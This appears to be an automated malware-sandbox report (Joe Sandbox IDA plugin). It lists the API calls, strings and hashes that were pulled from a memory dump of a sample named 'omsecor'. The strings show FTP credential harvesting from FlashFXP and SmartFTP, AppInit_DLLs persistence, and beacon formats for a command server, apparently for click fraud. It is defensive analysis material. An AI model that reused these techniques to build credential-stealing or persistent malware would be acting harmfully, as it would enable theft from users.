                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                          • String ID: Shell_TrayWnd$eventConn
                          • API String ID: 2141107913-3455059086
                          • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                          • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
                          • StrStrIA.SHLWAPI(?,?), ref: 00404913
                          • StrStrIA.SHLWAPI(?,?), ref: 00404925
                          • StrStrIA.SHLWAPI(?,?), ref: 00404935
                          • StrStrIA.SHLWAPI(?,?), ref: 00404947
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                          • API String ID: 1635188419-1322549247
                          • Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                          • Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                          APIs
                          • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                          • GetLocalTime.KERNEL32(?), ref: 00407387
                          • GetLocalTime.KERNEL32(?), ref: 0040738D
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                          • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                          • String ID:
                          • API String ID: 3166187867-0
                          • Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                          • Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID:
                          • String ID: http$+@
                          • API String ID: 0-4127549746
                          • Opcode ID: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                          • Opcode Fuzzy Hash: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandFolderOpenPathStrings
                          • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                          • API String ID: 1994525040-4055253781
                          • Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                          • Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004099EB
                          • SysAllocString.OLEAUT32(?), ref: 004099F9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </domain>$</url>$<domain>$<url>$http://
                          • API String ID: 2525500382-924421446
                          • Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                          • Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                          APIs
                          • SysFreeString.OLEAUT32(75C0F6A0), ref: 00408F82
                          • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                          • Opcode Fuzzy Hash: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                          • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                          • Sleep.KERNEL32(00002710), ref: 0040ADA4
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectInternet
                          • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                          • API String ID: 362191241-2593661552
                          • Opcode ID: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                          • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                          • Opcode Fuzzy Hash: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                          • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                          APIs
                          • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                          • __FindPESection.LIBCMT ref: 0040D8AC
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindHandlersScopeSectionTableValidate
                          • String ID:
                          • API String ID: 876702719-0
                          • Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                          • Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004088E4
                          • SysFreeString.OLEAUT32(?), ref: 004088E9
                          • SysFreeString.OLEAUT32(?), ref: 004089D3
                          • SysFreeString.OLEAUT32(?), ref: 004089D8
                          • SysFreeString.OLEAUT32(?), ref: 004089F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: +@
                          • API String ID: 3341692771-3835504741
                          • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                          • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                          APIs
                          • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                          • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                          • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                          • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                          • API String ID: 3100629401-2436734164
                          • Opcode ID: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                          • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                          • Opcode Fuzzy Hash: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                          • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
                          APIs
                          • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                          • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                          • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • _memset.LIBCMT ref: 004025DA
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                          • String ID: none
                          • API String ID: 2353737338-2140143823
                          • Opcode ID: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
                          • Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
                          • Opcode Fuzzy Hash: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
                          • Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094E6
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                          • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                          APIs
                          • _memset.LIBCMT ref: 0040A26B
                          • SysAllocString.OLEAUT32(?), ref: 0040A28E
                          • SysAllocString.OLEAUT32(?), ref: 0040A296
                          • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                          • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                            • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                            • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                            • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                          • String ID: J(@
                          • API String ID: 3143865713-2848800318
                          • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                          • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                          • CloseHandle.KERNEL32(00000000), ref: 00407880
                          • GetTickCount.KERNEL32 ref: 00407888
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCountCreateHandleModuleNameTickTime
                          • String ID: UniqueNum
                          • API String ID: 1853814767-3816303966
                          • Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                          • Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB
                          APIs
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                          • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerRead
                          • String ID: UniqueNum$d$hOAd$x
                          • API String ID: 1528952607-1018652783
                          • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                          • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                          • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                          • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                          • API String ID: 4026185228-3265104503
                          • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                          • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409B00
                          • SysAllocString.OLEAUT32(?), ref: 00409B0E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </title>$</url>$<title>$<url>
                          • API String ID: 2525500382-2286408829
                          • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                          • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                          • Sleep.KERNEL32(00002710), ref: 0040AAC1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                          • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                          Strings
                          • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                          • 0, xrefs: 0040AA5B
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                          • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                          • API String ID: 3713053250-1268808612
                          • Opcode ID: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                          • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                          • Opcode Fuzzy Hash: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                          • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                          APIs
                          • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                          • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 3777474486-0
                          • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                          • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                          • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                          • CloseHandle.KERNEL32(?), ref: 00408452
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 1974014688-0
                          • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                          • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                          APIs
                          • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                          • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                          • String ID: POST
                          • API String ID: 961146071-1814004025
                          • Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                          • Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                          Strings
                          • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                          • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                          • personal favorites, xrefs: 00405176
                          • folder, xrefs: 00405184
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandOpenStrings
                          • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                          • API String ID: 3923277744-821743658
                          • Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                          • Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                          APIs
